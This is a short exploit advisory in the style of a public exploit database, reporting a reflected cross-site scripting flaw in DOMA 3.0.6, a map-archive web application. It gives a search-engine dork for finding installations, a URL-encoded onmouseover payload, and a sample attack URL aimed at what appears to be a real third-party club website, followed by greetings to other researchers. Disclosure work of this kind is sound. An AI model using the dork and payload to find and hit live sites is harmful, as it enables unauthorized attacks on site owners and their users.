============================================================================ | # Title : doma 3.0.6 xss Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 FranASSais V.(Pro) | | # Version : 3.0.6 | | # Vendor : http://www.matstroeng.se/doma/ | | # Dork : Digital Orienteering Map Archive, version 1.0 | Log in | ============================================================================ poc : [+] Dorking Adegn Google Or Other Search Enggine [+] use payload : %22onmouseover%3d'prompt(1373)'bad%3d%22 http://www.orivedenponnistus.fi//suunnistus/doma/users.php/%22onmouseover%3d'prompt(903296)'bad%3d%22 Greetz :---------------------------------------------------------------------------------------- | jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic | | ================================================================================================